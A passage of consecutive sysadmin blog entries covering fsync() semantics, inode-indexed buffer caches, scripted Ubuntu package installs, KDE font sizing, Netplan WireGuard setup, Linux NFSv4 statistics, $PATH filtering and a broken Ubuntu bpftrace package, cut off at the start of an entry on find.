Adding metadata has an assortment of challenges and overheads. If you add it to dirty buffers themselves, you have to worry about clearing this metadata when a file descriptor is closed or a file object is deallocated (including when the process exits). If you instead attach metadata about dirty buffers to file descriptors or file objects, there's a variety of situations where other IO involving the buffer requires updating your metadata, including the kernel writing out dirty buffers on its own without a fsync() or a sync() and then perhaps deallocating the now clean buffer to free up memory.

Being as restrictive as POSIX allows probably also has low benefits in practice. To be a clear benefit, you would need to have multiple things writing significant amounts of data to the same file and fsync()'ing their data separately; this is when the file descriptor (or file object) specific fsync() saves you a bunch of data write traffic over the 'fsync() the entire file' approach. But as far as I know, this is a pretty unusual IO pattern. Much of the time, the thing fsync()'ing the file is the only writer, either because it's the only thing dealing with the file or because updates to the file are being coordinated through it so that processes don't step over each other.

PS: If you wanted to implement this, the simplest option would be to store the file descriptor and PID (as numbers) as additional metadata with each buffer. When the system fsync()'d a file, it could check the current file descriptor number and PID against the saved ones and only flush buffers where they matched, or where these values had been cleared to signal an uncertain owner. This would flush more than strictly necessary if the file descriptor number (or the process ID) had been reused or buffers had been touched in some way that caused the kernel to clear the metadata, but doing more work than POSIX strictly requires is relatively harmless.

Sidebar: fsync() and mmap() in POSIX

Under a strict reading of the POSIX fsync() specification, it's not entirely clear how you're properly supposed to fsync() data written through mmap() mappings. If 'all data for the open file descriptor' includes pages touched through mmap(), then you have to keep the file descriptor you used for mmap() open, despite POSIX mmap() otherwise implicitly allowing you to close it; my view is that this is at least surprising. If 'all data' only includes data directly written through the file descriptor with system calls, then there's no way to trigger a fsync() for mmap()'d data.

The obviousness of indexing the Unix filesystem buffer cache by inodes

By: cks

Like most operating systems, Unix has an in-memory cache of filesystem data. Originally this was a fixed size buffer cache that was maintained separately from the memory used by processes, but later it became a unified cache that was used for both memory mappings established through mmap() and regular read() and write() IO (for good reasons). Whenever you have a cache, one of the things you need to decide is how the cache is indexed. The more or less required answer for Unix is that the filesystem cache is indexed by inode (and thus filesystem, as inodes are almost always attached to some filesystem).

Unix has three levels of indirection for straightforward IO. Processes open and deal with file descriptors, which refer to underlying file objects, which in turn refer to an inode. There are various situations, such as calling dup(), where you will wind up with two file descriptors that refer to the same underlying file object. Some state is specific to file descriptors, but other state is held at the level of file objects, and some state has to be held at the inode level, such as the last modification time of the inode. For mmap()'d files, we have a 'virtual memory area', which is a separate level of indirection that is on top of the inode.

The biggest reason to index the filesystem cache by inode instead of file descriptor or file object is coherence. If two processes separately open the same file, getting two separate file objects and two separate file descriptors, and then one process writes to the file while the other reads from it, we want the reading process to see the data that the writing process has written. The only thing the two processes naturally share is the inode of the file, so indexing the filesystem cache by inode is the easiest way to provide coherence. If the kernel indexed by file object or file descriptor, it would have to do extra work to propagate updates through all of the indirection. This includes the 'updates' of reading data off disk; if you index by inode, everyone reading from the file automatically sees fetched data with no extra work.

(Generally we also want this coherence for two processes that both mmap() the file, and for one process that mmap()s the file while another process read()s or write()s to it. Again this is easiest to achieve if everything is indexed by the inode.)
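To make this concrete, here is a toy sketch (invented names, not any real kernel's code) of a filesystem cache indexed by (device, inode, offset). Notice that nothing about a file descriptor or file object appears in the lookup key, which is what gives two independent openers of the same file a shared view:

#include <stdio.h>
#include <stdlib.h>

struct key { unsigned dev, ino; unsigned long off; };
struct entry { struct key k; struct entry *next; char data[512]; };

#define NBUCKETS 256
static struct entry *bucket[NBUCKETS];

static unsigned hash(struct key k) {
    return (k.dev * 31u + k.ino * 131u + (unsigned)k.off) % NBUCKETS;
}

/* any process that can name the inode finds the same cached data */
static struct entry *lookup(struct key k) {
    struct entry *e;
    for (e = bucket[hash(k)]; e != NULL; e = e->next)
        if (e->k.dev == k.dev && e->k.ino == k.ino && e->k.off == k.off)
            return e;
    return NULL;
}

static struct entry *insert(struct key k) {
    struct entry *e = calloc(1, sizeof *e);
    e->k = k;
    e->next = bucket[hash(k)];
    bucket[hash(k)] = e;
    return e;
}

int main(void) {
    struct key k = { 1, 42, 0 };         /* device 1, inode 42, offset 0 */
    insert(k)->data[0] = 'x';            /* "writer" populates the cache */
    printf("%c\n", lookup(k)->data[0]);  /* "reader" sees the same data */
    return 0;
}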

Another reason to index by inode is how easy it is to handle various situations in the filesystem cache when things are closed or removed, especially when the filesystem cache holds writes that are being buffered in memory before being flushed to disk. Processes frequently close file descriptors and drop file objects, including by exiting, but any buffered writes still need to be findable so they can be flushed to disk before, say, the filesystem itself is unmounted. Similarly, if an inode is deleted we don't want to flush its pending buffered writes to disk (and certainly we can't allocate blocks for them, since there's nothing to own those blocks any more), and we want to discard any clean buffers associated with it to free up memory. If you index the cache by inode, all you need is for filesystems to be able to find all their inodes; everything else more or less falls out naturally.

This doesn't absolutely require a Unix to index its filesystem buffer caches by inode. But I think it's clearly easiest to index the filesystem cache by inode, instead of the other available references. The inode is the common point for all IO involving a file (partly because it's what filesystems deal with), which makes it the easiest index; everyone has an inode reference and in a properly implemented Unix, everyone is using the same inode reference.

(In fact all sorts of fun tend to happen in Unixes if they have a filesystem that gives out different in-kernel inodes that all refer to the same on-disk filesystem object. Usually this happens by accident or filesystem bugs.)

How we automate installing extra packages during Ubuntu installs

By: cks

We have a local system for installing Ubuntu machines, and one of the important things it does is install various additional Ubuntu packages that we want as part of our standard installs. These days we have two sorts of standard installs, a 'base' set of packages that everything gets and a broader set of packages that login servers and compute servers get (to make them more useful and usable by people). Specialized machines need additional packages, and while we can automate installation of those too, they're generally a small enough set of packages that we document them in our install instructions for each machine and install them by hand.

There are probably clever ways to do bulk installs of Ubuntu packages, but if so, we don't use them. Our approach is instead a brute force one. We have files that contain lists of packages, such as a 'base' file, and these files just contain a list of packages with optional comments:

# Partial example of Basic package set
amanda-client
curl
jq
[...]

# decodes kernel MCE/machine check events
rasdaemon

# Be able to build Debian (Ubuntu) packages on anything
build-essential fakeroot dpkg-dev devscripts automake 

(Like all of the rest of our configuration information, these package set files live in our central administrative filesystem. You could distribute them in some other way, for example fetching them with rsync or even HTTP.)

To install these packages, we use grep to extract the actual packages into a big list and feed the big list to apt-get. This is more or less:

pkgs=$(cat $PKGDIR/$s | grep -v '^#' | grep -v '^[ \t]*$')
apt-get -qq -y install $pkgs

(This will abort if any of the packages we list aren't available. We consider this a feature, because it means we have an error in the list of packages.)

A more organized and minimal approach might be to add the '--no-install-recommends' option, but we started without it and we don't particularly want to go back to find which recommended packages we'd have to explicitly add to our package lists.

At least some of the 'base' package installs could be done during the initial system install process from our customized Ubuntu server ISO image, since you can specify additional packages to install. However, doing package installs that way would create a series of issues in practice. We'd probably need to more carefully track which package came from which Ubuntu collection, since only some of them are enabled during the server install process; it would be harder to update the lists; and the tools for handling the whole process would be a lot more limited, as would our ability to troubleshoot any problems.

Doing this additional package install in our 'postinstall' process means that we're doing it in a full Unix environment where we have all of the standard Unix tools, and we can easily look around the system if and when there's a problem. Generally we've found that the more of our installs we can defer to once the system is running normally, the better.

(Also, the less the Ubuntu installer does, the faster it finishes and the sooner we can get back to our desks.)

(This entry was inspired by parts of a blog post I read recently and reflecting about how we've made setting up new versions of machines pretty easy, assuming our core infrastructure is there.)

The mystery (to me) of tiny font sizes in KDE programs I run

By: cks

Over on the Fediverse I tried a KDE program and ran into a common issue for me:

It has been '0' days since a KDE app started up with too-small fonts on my bespoke fvwm based desktop, and had no text zoom. I guess I will go use a browser, at least I can zoom fonts there.

Maybe I could find a KDE settings thing and maybe find where and why KDE does this (it doesn't happen in GNOME apps), but honestly it's simpler to give up on KDE based programs and find other choices.

(The specific KDE program I was trying to use this time was NeoChat.)

My fvwm based desktop environment has an XSettings daemon running, which I use in part to set up a proper HiDPI environment (also), which doesn't talk about KDE fonts because I never figured that out. I suspect that my HiDPI display is part of why KDE programs often or always seem to pick tiny fonts, but I don't particularly know why. Based on the xsettingsd documentation and the registry, there doesn't seem to be any KDE specific font settings, and I'm setting the Gtk/FontName setting to a font that KDE doesn't seem to be using (which I could only verify once I found a way to see the font I was specifying).

After some searching I found the systemsettings program through the Arch wiki's page on KDE and was able to turn up its font sizes in a way that appears to be durable (ie, it stays after I stop and start systemsettings). However, this hasn't affected the fonts I see in NeoChat when I run it again. There are a bunch of font settings, but maybe NeoChat is using the 'small' font for some reason (apparently which app uses what font setting can be variable).

QT (the underlying GUI toolkit of much or all of KDE) has its own set of environment variables for scaling things on HiDPI displays, and setting $QT_SCALE_FACTOR does size up NeoChat (although apparently bits of Plasma ignore these, although I think I'm unlikely to run into this since I don't want to use KDE's desktop components).
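For example, something along these lines from a shell does size things up (2 being a plausible factor for a 2x HiDPI display):

QT_SCALE_FACTOR=2 neochat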

Some KDE applications have their own settings files with their own font sizes; one example I know of is kdiff3. This is quite helpful because if I'm determined enough, I can either adjust the font sizes in the program's settings or at least go edit the configuration file (in this case, .config/kdiff3rc, I think, not .kde/share/config/kdiff3rc). However, not all KDE applications allow you to change font sizes through either their GUI or a settings file, and NeoChat appears to be one of the ones that don't.

In theory now that I've done all of this research I could resize NeoChat and perhaps other KDE applications through $QT_SCALE_FACTOR. In practice I feel I would rather switch to applications that interoperate better with the rest of my environment unless for some reason the KDE application is either my only choice or the significantly superior one (as it has been so far for kdiff3 for my usage).

Using Netplan to set up WireGuard on Ubuntu 22.04 works, but has warts

By: cks

For reasons outside the scope of this entry, I recently needed to set up WireGuard on an Ubuntu 22.04 machine. When I did this before for an IPv6 gateway, I used systemd-networkd directly. This time around I wasn't going to set up a single peer and stop; I expected to iterate and add peers several times, which made netplan's ability to update and re-do your network configuration look attractive. Also, our machines are already using Netplan for their basic network configuration, so this would spare my co-workers from having to learn about systemd-networkd.

Conveniently, Netplan supports multiple configuration files so you can put your WireGuard configuration into a new .yaml file in your /etc/netplan. The basic version of a WireGuard endpoint with purely internal WireGuard IPs is straightforward:

network:
  version: 2
  tunnels:
    our-wg0:
      mode: wireguard
      addresses: [ 192.168.X.1/24 ]
      port: 51820
      key:
        private: '....'
      peers:
        - keys:
            public: '....'
          allowed-ips: [ 192.168.X.10/32 ]
          keepalive: 90
          endpoint: A.B.C.D:51820

(You may want something larger than a /24 depending on how many other machines you think you'll be talking to. Also, this configuration doesn't enable IP forwarding, which is a feature in our particular situation.)

If you're using netplan's systemd-networkd backend, which you probably are on an Ubuntu server, you can apparently put your keys into files instead of needing to carefully guard the permissions of your WireGuard /etc/netplan file (which normally has your private key in it).

If you write this out and run 'netplan try' or 'netplan apply', it will duly apply all of the configuration and bring your 'our-wg0' WireGuard configuration up as you expect. The problems emerge when you change this configuration, perhaps to add another peer, and then re-do your 'netplan try', because when you look you'll find that your new peer hasn't been added. This is a sign of a general issue; as far as I can tell, netplan (at least in Ubuntu 22.04) can set up WireGuard devices from scratch but it can't update anything about their WireGuard configuration once they're created. This is probably a limitation in the Ubuntu 22.04 version of systemd-networkd that's only changed in the very latest systemd versions. In order to make WireGuard level changes, you need to remove the device, for example with 'ip link del dev our-wg0', and then re-run 'netplan try' (or 'netplan apply') to re-create the WireGuard device from scratch; the recreated version will include all of your changes.
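So in practice, the update cycle on Ubuntu 22.04 looks like this:

# after editing the WireGuard .yaml in /etc/netplan:
sudo ip link del dev our-wg0
sudo netplan apply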

(The latest online systemd.netdev manual page says that systemd-networkd will try to update netdev configurations if they change, and .netdev files are where WireGuard settings go. The best information I can find is that this change appeared in systemd v257, although the Fedora 41 systemd.netdev manual page has this same wording and it has systemd '256.11'. Maybe there was a backport into Fedora.)

In our specific situation, deleting and recreating the WireGuard device is harmless and we're not going to be doing it very often anyway. In other configurations things may not be so straightforward and so you may need to resort to other means to apply updates to your WireGuard configuration (including working directly through the 'wg' tool).

I'm not impressed by the state of NFS v4 in the Linux kernel

By: cks

Although NFS v4 is (in theory) the latest great thing in NFS protocol versions, for a long time we only used NFS v3 for our fileservers and our Ubuntu NFS clients. A few years ago we switched to NFS v4 due to running into a series of problems our people were experiencing with NFS (v3) locks (cf), since NFS v4 locks are integrated into the protocol and NFS v4 is the 'modern' NFS version that's probably receiving more attention than anything to do with NFS v3.

(NFS v4 locks are handled relatively differently than NFS v3 locks.)

Moving to NFS v4 did fix our NFS lock issues in that stuck NFS locks went away, when before they'd been a regular issue on our IMAP server. However, all has not turned out to be roses, and the result has left me not really impressed with the state of NFS v4 in the Linux kernel. In Ubuntu 22.04's 5.15.x server kernel, we've now run into scalability issues in both the NFS server (which is what sparked our interest in how many NFS server threads to run and what NFS server threads do in the kernel), and now in the NFS v4 client (where I have notes that let me point to a specific commit with the fix).

(The NFS v4 server issue we encountered may be the one fixed by this commit.)

What our two issues have in common is that both are things that you only find under decent or even significant load. That these issues both seem to have still been present as late as kernels 6.1 (server) and 6.6 (client) suggests that neither the Linux NFS v4 server nor the Linux NFS v4 client had been put under serious load until then, or at least not by people who could diagnose their problems precisely enough to identify the problem and get kernel fixes made. While both issues are probably fixed now, their past presence leaves me wondering what other scalability issues are lurking in the kernel's NFS v4 support, partly because people have mostly been using NFS v3 until recently (like us).

We're not going to go back to NFS v3 in general (partly because of the clear improvement in locking), and the server problem we know about has been wiped away because we're moving our NFS fileservers to Ubuntu 24.04 (and some day the NFS clients will move as well). But I'm braced for further problems, including ones in 24.04 that we may be stuck with for a while.

PS: I suspect that part of the issues may come about because the Linux NFS v4 client and the Linux NFS v4 server don't add NFS v4 operations at the same time. As I found out, the server supports more operations than the client uses but the client's use is of whatever is convenient and useful for it, not necessarily by NFS v4 revision. If the major use of Linux NFS v4 servers is with v4 clients, this could leave the server implementation of operations under-used until the client starts using them (and people upgrade clients to kernel versions with that support).

Why I have a little C program to filter a $PATH (more or less)

By: cks

I use a non-standard shell and have for a long time, which means that I have to write and maintain my own set of dotfiles (which sometimes has advantages). In the long ago days when I started doing this, I had a bunch of accounts on different Unixes around the university (as was the fashion at the time, especially if you were a sysadmin). So I decided that I was going to simplify my life by having one set of dotfiles for rc that I used on all of my accounts, across a wide variety of Unixes and Unix environments. That way, when I made an improvement in a shell function I used, I could get it everywhere by just pushing out a new version of my dotfiles.

(This was long enough ago that my dotfile propagation was mostly manual, although I believe I used rdist for some of it.)

In the old days, one of the problems you faced if you wanted a common set of dotfiles across a wide variety of Unixes was that there were a lot of things that potentially could be in your $PATH. Different Unixes had different sets of standard directories, and local groups put local programs (that I definitely wanted access to) in different places. I could have put everything in $PATH (giving me a gigantic one) or tried to carefully scope out what system environment I was on and set an appropriate $PATH for each one, but I decided to take a more brute force approach. I started with a giant potential $PATH that listed every last directory that could appear in $PATH in any system I had an account on, and then I had a C program that filtered that potential $PATH down to only things that existed on the local system. Because it was written in C and had to stat() things anyways, I made it also keep track of what concrete directories it had seen and filter out duplicates, so that if there were symlinks from one name to another, I wouldn't get it twice in my $PATH.

(Looking at historical copies of the source code for this program, the filtering of duplicates was added a bit later; the very first version only cared about whether a directory existed or not.)

The reason I wrote a C program for this (imaginatively called 'isdirs') instead of using shell builtins to do this filtering (which is entirely possible) is primarily because this was so long ago that running a C program was definitely faster than using shell builtins in my shell. I did have a fallback shell builtin version in case my C program might not be compiled for the current system and architecture, although it didn't do the filtering of duplicates.
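As an illustration, here is a minimal reconstruction in C of such an 'isdirs' filter - a sketch of the idea, not my original program:

#include <stdio.h>
#include <sys/stat.h>

#define MAXSEEN 1024

int main(int argc, char **argv) {
    struct stat seen[MAXSEEN], st;
    int nseen = 0, i, j, dup;

    for (i = 1; i < argc; i++) {
        if (stat(argv[i], &st) != 0 || !S_ISDIR(st.st_mode))
            continue;            /* missing, or not a directory */
        for (dup = 0, j = 0; j < nseen && !dup; j++)
            if (seen[j].st_dev == st.st_dev && seen[j].st_ino == st.st_ino)
                dup = 1;         /* a symlink or duplicate of one we've seen */
        if (dup)
            continue;
        if (nseen < MAXSEEN)
            seen[nseen++] = st;
        printf(nseen > 1 ? " %s" : "%s", argv[i]);
    }
    putchar('\n');
    return 0;
}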

(Rc uses a real list for its equivalent of $PATH instead of the awkward ':' separated pseudo-list that other Unix shells use, so both my C program and my shell builtin could simply take a conventional argument list of directories rather than having to try to crack a $PATH apart.)

(This entry was inspired by Ben Zanin's trick(s) to filter out duplicate $PATH entries (also), which prompted me to mention my program.)

PS: rc technically only has one dotfile, .rcrc, but I split my version up into several files that did different parts of the work. One reason for this split was so that I could source only some parts to set up my environment in a non-interactive context (also).

Sidebar: the rc builtin version

Rc has very few builtins and those builtins don't include test, so this is a bit convoluted:

path=`{tpath=() pe=() {
        for (pe in $path)
           builtin cd $pe >[1=] >[2=] && tpath=($tpath $pe)
        echo $tpath
       } >[2]/dev/null}

In a conventional shell with a test builtin, you would just use 'test -d' to see if directories were there. In rc, the only way a builtin can tell you whether a directory exists is to try to cd to it. That we change directories is harmless, because everything is running inside the equivalent of a Bourne shell $(...).

Keen eyed people will have noticed that this version doesn't work if anything in $path has a space in it, because we pass the result back as a whitespace-separated string. This is a limitation shared with how I used the C program, but I never had to use a Unix where one of my $PATH entries needed a space in it.

The profusion of things that could be in your $PATH on old Unixes

By: cks

In the beginning, which is to say the early days of Bell Labs Research Unix, life was simple and there was only /bin. Soon afterwards that disk ran out of space and we got /usr/bin (and all of /usr), and some people might even have put /etc on their $PATH. When UCB released BSD Unix, they added /usr/ucb as a place for (some of) their new programs and put some more useful programs in /etc (and at some point there was also /usr/etc); now you had three or four $PATH entries. When window systems showed up, people gave them their own directories too, such as /usr/bin/X11 or /usr/openwin/bin, and this pattern was followed by other third party collections of programs, with (for example) /usr/bin/mh holding all of the (N)MH programs (if you installed them there). A bit later, SunOS 4.0 added /sbin and /usr/sbin and other Unixes soon copied them, adding yet more potential $PATH entries.

(Sometimes X11 wound up in /usr/X11/bin, or /usr/X11<release>/bin. OpenBSD still has a /usr/X11R6 directory tree, to my surprise.)

When Unix went out into the field, early system administrators soon learned that they didn't want to put local programs into /usr/bin, /usr/sbin, and so on. Of course there was no particular agreement on where to put things, so people came up with all sorts of options for the local hierarchy, including /usr/local, /local, /slocal, /<group name> (such as /csri or /dgp), and more. Often these /local/bin things had additional subdirectories for things like the locally built version of X11, which might be plain 'bin/X11' or have a version suffix, like 'bin/X11R4', 'bin/X11R5', or 'bin/X11R6'. Some places got more elaborate; rather than putting everything in a single hierarchy, they put separate things into separate directory hierarchies. When people used /opt for this, you could get /opt/gnu/bin, /opt/tk/bin, and so on.

(There were lots of variations, especially for locally built versions of X11. And a lot of people built X11 from source in those days, at least in the university circles I was in.)

Unix vendors didn't sit still either. As they began adding more optional pieces they started splitting them up into various directory trees, both for their own software and for third party software they felt like shipping. Third party software was often planted into either /usr/local or /usr/contrib, although there were other options, and vendor stuff could go in many places. A typical example is Solaris 9's $PATH for sysadmins (and I think that's not even fully complete, since I believe Solaris 9 had some stuff hiding under /usr/xpg4). Energetic Unix vendors could and did put various things in /opt under various names. By this point, commercial software vendors that shipped things for Unixes also often put them in /opt.

This led to three broad consequences for people using Unixes back in those days. First, you invariably had a large $PATH, between all of the standard locations, the vendor additions, and the local additions on top of those (and possibly personal 'bin' directories in your $HOME). Second, there was a lot of variation in the $PATH you wanted, both from Unix to Unix (with every vendor having their own collection of non-standard $PATH additions) and from site to site (with sysadmins making all sorts of decisions about where to put local things). Third, setting yourself up on a new Unix often required a bunch of exploration and digging. Unix vendors often didn't add everything that you wanted to their standard $PATH, for example. If you were lucky and got an account at a well run site, their local custom new account dotfiles would set you up with a correct and reasonably complete local $PATH. If you were a sysadmin exploring a new-to-you Unix, you might wind up writing a grumpy blog entry.

(This got much more complicated for sites that had a multi-Unix environment, especially with shared home directories.)

Modern Unix life is usually at least somewhat better. On Linux, you're typically down to two main directories (/usr/bin and /usr/sbin) and possibly some things in /opt, depending on local tastes. The *BSDs are a little more expansive but typically nowhere near the heights of, for example, Solaris 9's $PATH (see the comments on that entry too).

The Prometheus host agent is missing some Linux NFSv4 RPC stats (as of 1.8.2)

By: cks

Over on the Fediverse I said:

This is my face when the Prometheus host agent provides very incomplete monitoring of NFS v4 RPC operations on modern kernels that can likely hide problems. For NFS servers I believe that you get only NFS v4.0 ops, no NFS v4.1 or v4.2 ones. For NFS v4 clients things confuse me but you certainly don't get all of the stats as far as I can see.

When I wrote that Fediverse post, I hadn't peered far enough into the depths of the Linux kernel to be sure what was missing, but now that I understand the Linux kernel NFS v4 server and client RPC operations stats I can provide a better answer of what's missing. All of this applies to node_exporter as of version 1.8.2 (the current one as I write this).

(I now think 'very incomplete' is somewhat wrong, but not entirely so, especially on the server side.)

Importantly, what's missing is different for the server side and the client side, with the client side providing information on operations that the server side doesn't. This can make it very puzzling if you're trying to cross-compare two 'NFS RPC operations' graphs, one from a client and one from a server, because the client graph will show operations that the server graph doesn't.

In the host agent code, the actual stats are read from /proc/net/rpc/nfs and /proc/net/rpc/nfsd by a separate package, prometheus/procfs, and are parsed in nfs/parse.go. For the server case, if we cross compare this to the kernel's include/linux/nfs4.h, what's missing from server stats is all NFS v4.1, v4.2, and RFC 8276 xattr operations, everything from operation 40 through operation 75 (as I write this).

Because the Linux NFS v4 client stats are more confusing and aren't so nicely ordered, the picture there is more complex. The nfs/parse.go code handles everything up through 'Clone', and is missing from 'Copy' onward. However, both what it has and what it's missing are a mixture of NFS v4, v4.1, and v4.2 operations; for example, 'Allocate' and 'Clone' (both included) are v4.2 operations, while 'Lookupp', a v4.0 operation, is missing from client stats. If I'm reading the code correctly, the missing NFS v4 client operations are currently (using somewhat unofficial names):

Copy OffloadCancel Lookupp LayoutError CopyNotify Getxattr Setxattr Listxattrs Removexattr ReadPlus

Adding the missing operations to the Prometheus host agent would require updates to both prometheus/procfs (to add fields for them) and to node_exporter itself, to report the fields. The NFS client stats collector in collector/nfs_linux.go uses Go reflection to determine the metrics to report and so needs no updates, but the NFS server stats collector in collector/nfsd_linux.go directly knows about all 40 of the current operations and so would need code updates, either to add the new fields or to switch to using Go reflection.

If you want numbers for scale, at the moment node_exporter reports on 59 out of 69 NFS v4 client operations (the ten listed above are what's missing), and is missing 36 NFS v4 server operations (reporting on what I believe is 36 out of 72). My ability to decode what the kernel NFS v4 client and server code is doing is limited, so I can't say exactly how these operations match up and, for example, what client operations the server stats are missing.

(I haven't made a bug report about this (yet) and may not do so, because doing so would require making my Github account operable again, something I'm sort of annoyed by. Github's choice to require me to have MFA to make bug reports is not the incentive they think it is.)

Linux kernel NFSv4 server and client RPC operation statistics

By: cks

NFS servers and clients communicate using RPC, sending various NFS v3, v4, and possibly v2 (but we hope not) RPC operations to the server and getting replies. On Linux, the kernel exports statistics about these NFS RPC operations in various places, with a global summary in /proc/net/rpc/nfsd (for the NFS server side) and /proc/net/rpc/nfs (for the client side). Various tools will extract this information and convert it into things like metrics, or present it on the fly (for example, nfsstat(8)). However, as far as I know what is in those files and especially how RPC operations are reported is not well documented, and also confusing, which is a problem if you discover that something has an incomplete knowledge of NFSv4 RPC stats.

For a general discussion of /proc/net/rpc/nfsd, see Svenn D'Hert's nfsd stats explained article. I'm focusing on NFSv4, which is to say the 'proc4ops' line. This line is produced in nfsd_show in fs/nfsd/stats.c. The line starts with a count of how many operations there are, such as 'proc4ops 76', and then has one number for each operation. What are the operations and how many of them are there? That's more or less found in the nfs_opnum4 enum in include/linux/nfs4.h. You'll notice that there are some gaps in the operation numbers; for example, there's no 0, 1, or 2. Despite there being no such actual NFS v4 operations, 'proc4ops' starts with three 0s for them, because it works with an array numbered by nfs_opnum4 and like all C arrays, it starts at 0.

(The counts of other, real NFS v4 operations may be 0 because they're never done in your environment.)
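If you want to poke at the raw numbers yourself, a small C sketch (the output format is invented) can decode the 'proc4ops' line into per-operation counts:

#include <stdio.h>
#include <string.h>

int main(void)
{
    char line[4096];
    FILE *f = fopen("/proc/net/rpc/nfsd", "r");

    if (f == NULL)
        return 1;
    while (fgets(line, sizeof(line), f) != NULL) {
        int nops, n, op = 0;
        unsigned long count;
        char *p = line;

        if (strncmp(line, "proc4ops ", 9) != 0)
            continue;
        p += 9;
        if (sscanf(p, "%d%n", &nops, &n) != 1)
            break;
        p += n;
        /* one count per operation, indexed by nfs_opnum4 (0 .. nops-1) */
        while (op < nops && sscanf(p, "%lu%n", &count, &n) == 1) {
            printf("op %d: %lu\n", op, count);
            p += n;
            op++;
        }
    }
    fclose(f);
    return 0;
}

The first three counts (operations 0 through 2) should always be zero, for the reason above.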

For NFS v4 client operations, we look at the 'proc4' line in /proc/net/rpc/nfs. Like the server's 'proc4ops' line, it starts with a count of how many operations are being reported on, such as 'proc4 69', and then a count for each operation. Unfortunately for us and everyone else, these operations are not numbered the same as the NFS server operations. Instead the numbering is given in an anonymous and unnumbered enum in include/linux/nfs4.h that starts with 'NFSPROC4_CLNT_NULL = 0,' (as a spoiler, the 'null' operation is not unused, contrary to the include file's comment). The actual generation and output of /proc/net/rpc/nfs is done in rpc_proc_show in net/sunrpc/stats.c. The whole structure this code uses is set up in fs/nfs/nfs4xdr.c, and while there is a confusing level of indirection, I believe the structure corresponds directly with the NFSPROC4_CLNT_* enum values.

What I think is going on is that Linux has decided to optimize its NFSv4 client statistics to only include the NFS v4 operations that it actually uses, rather than take up a bit of extra memory to include all of the NFS v4 operations, including ones that will always have a '0' count. Because the Linux NFS v4 client started using different NFSv4 operations at different times, some of these operations (such as 'lookupp') are out of order; when the NFS v4 client started using them, they had to be added at the end of the 'proc4' line to preserve backward compatibility with existing programs that read /proc/net/rpc/nfs.

PS: As far as I can tell from a quick look at fs/nfs/nfs3xdr.c, include/uapi/linux/nfs3.h, and net/sunrpc/stats.c, the NFS v3 server and client stats cover all of the NFS v3 operations and are in the same order, the order of the NFS v3 operation numbers.

How Ubuntu 24.04's bad bpftrace package appears to have happened

By: cks

When I wrote about Ubuntu 24.04's completely broken bpftrace '0.20.2-1ubuntu4.2' package (which is now no longer available as an Ubuntu update), I said it was a disturbing mystery how a theoretical 24.04 bpftrace binary was built in such a way that it depended on a shared library that didn't exist in 24.04. Thanks to the discussion in bpftrace bug #2097317, we have somewhat of an answer, which in part shows some of the challenges of building software at scale.

The short version is that the broken bpftrace package wasn't built in a standard Ubuntu 24.04 environment that only had released packages. Instead, it was built in a '24.04' environment that included (some?) proposed updates, and one of the included proposed updates was an updated version of libllvm18 that had the new shared library. Apparently there are mechanisms that should have acted to make the new bpftrace depend on the new libllvm18 if everything went right, but some things didn't go right and the new bpftrace package didn't pick up that dependency.

On the one hand, if you're planning interconnected package updates, it's a good idea to make sure that they work with each other, which means you may want to mingle some proposed updates into some of your build environments. On the other hand, if you allow your build environments to be contaminated with non-public packages this way, you really, really need to make sure that the dependencies work out. If you don't and packages become public in the wrong order, you get Ubuntu 24.04's result.

(While the RPM build process and package format would have avoided this specific problem, I'm pretty sure that there are similar ways to make it go wrong.)

Contaminating your build environment this way also makes testing your newly built packages harder. The built bpftrace binary would have run inside the build environment, because the build environment had the right shared library from the proposed libllvm18. To see the failure, you would have to run tests (including running the built binary) in a 'pure' 24.04 environment that had only publicly released package updates. This would require an extra package test step; I'm not clear if Ubuntu has this as part of their automated testing of proposed updates (there's some hints in the discussion that they do but that these tests were limited and didn't try to run the binary).

An alarmingly bad official Ubuntu 24.04 bpftrace binary package

By: cks

Bpftrace is a more or less official part of Ubuntu; it's even in the Ubuntu 24.04 'main' repository, as opposed to one of the less supported ones. So I'll present things in the traditional illustrated form (slightly edited for line length reasons):

$ bpftrace
bpftrace: error while loading shared libraries: libLLVM-18.so.18.1: cannot open shared object file: No such file or directory
$ readelf -d /usr/bin/bpftrace | grep libLLVM
 0x0...01 (NEEDED)  Shared library: [libLLVM-18.so.18.1]
$ dpkg -L libllvm18 | grep libLLVM
/usr/lib/llvm-18/lib/libLLVM.so.1
/usr/lib/llvm-18/lib/libLLVM.so.18.1
/usr/lib/x86_64-linux-gnu/libLLVM-18.so
/usr/lib/x86_64-linux-gnu/libLLVM.so.18.1
$ dpkg -l bpftrace libllvm18
[...]
ii  bpftrace       0.20.2-1ubuntu4.2 amd64 [...]
ii  libllvm18:amd64 1:18.1.3-1ubuntu1 amd64 [...]

I originally mis-diagnosed this as a libllvm18 packaging failure, but this is in fact worse. Based on trawling through packages.ubuntu.com, only Ubuntu 24.10 and later have a 'libLLVM-18.so.18.1' in any package; in Ubuntu 24.04, the correct name for this is 'libLLVM.so.18.1'. If you rebuild the bpftrace source .deb on a genuine 24.04 machine, you get a bpftrace build (and binary .deb) that does correctly use 'libLLVM.so.18.1' instead of 'libLLVM-18.so.18.1'.

As far as I can see, there are two things that could have happened here. The first is that Canonical simply built a 24.10 (or later) bpftrace binary .deb and put it in 24.04 without bothering to check if the result actually worked. I would like to say that this shows shocking disregard for the functioning of an increasingly important observability tool from Canonical, but actually it's not shocking at all, it's Canonical being Canonical (and they would like us to pay for this for some reason). The second and worse option is that Canonical is building 'Ubuntu 24.04' packages in an environment that is contaminated with 24.10 or later packages, shared libraries, and so on. This isn't supposed to happen in a properly operating package building environment that intends to create reliable and reproducible results, and it casts doubt on the provenance and reliability of all Ubuntu 24.04 packages.

(I don't know if there's a way to inspect binary .debs to determine anything about the environment they were built in, the way you can get some information about RPMs. Also, I now have a new appreciation for Fedora putting the Fedora release version into the actual RPM's 'release' name. Ubuntu 24.10 and 24.04 don't have the same version of bpftrace, so this isn't quite as simple as Canonical copying the 24.10 package to 24.04; 24.10 has 0.21.2, while 24.04 is theoretically 0.20.2.)

Incidentally, this isn't an issue of the shared library having its name changed, because if you manually create a 'libLLVM-18.so.18.1' symbolic link to the 24.04 libllvm18's 'libLLVM.so.18.1' and run bpftrace, what you get is:

$ bpftrace
: CommandLine Error: Option 'debug-counter' registered more than once!
LLVM ERROR: inconsistency in registered CommandLine options
abort

This appears to say that the Ubuntu 24.04 bpftrace binary is incompatible with the Ubuntu 24.04 libllvm18 shared libraries. I suspect that it was built against different LLVM 18 headers as well as different LLVM 18 shared libraries.

How to accidentally get yourself with 'find ... -name something*'

By: cks

Suppose that you're in some subdirectory /a/b/c, and you want to search all of /a for the presence of files for any version of some program:

